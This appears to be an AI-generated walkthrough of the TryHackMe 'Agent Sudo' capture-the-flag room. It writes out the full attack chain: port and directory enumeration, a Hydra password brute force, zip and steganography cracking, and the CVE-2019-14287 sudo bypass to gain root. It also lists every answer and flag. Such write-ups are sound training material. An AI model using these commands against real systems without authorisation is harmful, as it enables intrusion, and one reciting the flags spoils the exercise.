Understanding Cybersecurity CTF: Agent Sudo
This content is an AI-generated summary. If you encounter any misinformation or problematic content, please report it to cyb.hub@proton.me.
In this cybersecurity Capture The Flag (CTF) challenge, you are tasked with hacking into a secret server located under the deep sea. Your goal is to uncover the truth by following a series of steps involving enumeration, hash cracking, brute-force attacks, and privilege escalation.
Key Points
- Enumeration: Identify open ports and hidden directories.
- Hash Cracking and Brute-Force: Crack passwords for FTP, ZIP files, and SSH.
- Privilege Escalation: Exploit vulnerabilities to gain root access.
- Capture the Flag: Retrieve user and root flags.
Enumeration
Identifying Open Ports
Run an nmap scan to identify open ports:
nmap -sV -Pn -O -p- 10.10.209.115
| Port | Service | Version |
|---|---|---|
| 21 | ftp | vsftpd 3.0.3 |
| 22 | ssh | OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 |
| 80 | http | Apache httpd 2.4.29 ((Ubuntu)) |
Answer: 3
Redirecting to a Secret Page
Use Gobuster to find hidden directories:
gobuster dir --url http://10.10.209.115 --wordlist /usr/share/wordlists/dirb/common.txt
Key directories found:
/.htpasswd/.hta/.htaccess/index.php/server-status
Visit http://10.10.209.115/index.php to see the message:
Dear agents,
Use your own codename as user-agent to access the site.
From, Agent R
Answer: user-agent
Discovering the Agent Name
Use a codename similar to Agent R. After some trial, the letter C is found:
curl -A "C" -L 10.10.209.115
Message received:
Attention chris,
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!
From, Agent R
Answer: chris
Hash Cracking and Brute-Force
FTP Password
Brute force the FTP password using Hydra:
hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.209.115 ftp -I -V
Result:
[21][ftp] host: 10.10.209.115 login: chris password: crystal
Answer: crystal
ZIP File Password
Connect to the FTP and download the files. Use binwalk to extract the ZIP file from a PNG, then use John the Ripper to crack the ZIP file password.
Answer: alien
Steg Password
Decode the base64 message QXJlYTUx:
echo "QXJlYTUx" | base64 --decode
Result: Area51
Answer: Area51
Identifying the Other Agent
Extract the message from cute-alien.jpg using steghide:
steghide extract -sf cute-alien.jpg
Message content:
Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy, chris
Answer: james
SSH Password
Answer: hackerrules!
Capture the Flag
Connect via SSH:
ssh james@10.10.209.115
User Flag
Answer: b03d975e8c92a7c04146cfa7a5a313c7
Incident of the Photo
Search for Alien_autospy.jpg:
Answer: Roswell alien autopsy
Privilege Escalation
Check sudo permissions:
sudo -l
Result:
User james may run the following commands on agent-sudo:
(ALL, !root) /bin/bash
CVE Number for Escalation
Search for /bin/bash exploit cve:
Answer: CVE-2019-14287
Root Flag
Use the exploit found here:
sudo -u#-1 /bin/bash
Retrieve the root flag:
cat /root/root.txt
Message:
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is b53a02f55b57d4439e3341834d70c062
By, DesKel a.k.a Agent R
Answer: b53a02f55b57d4439e3341834d70c062
Bonus: Who is Agent R?
Answer: DesKel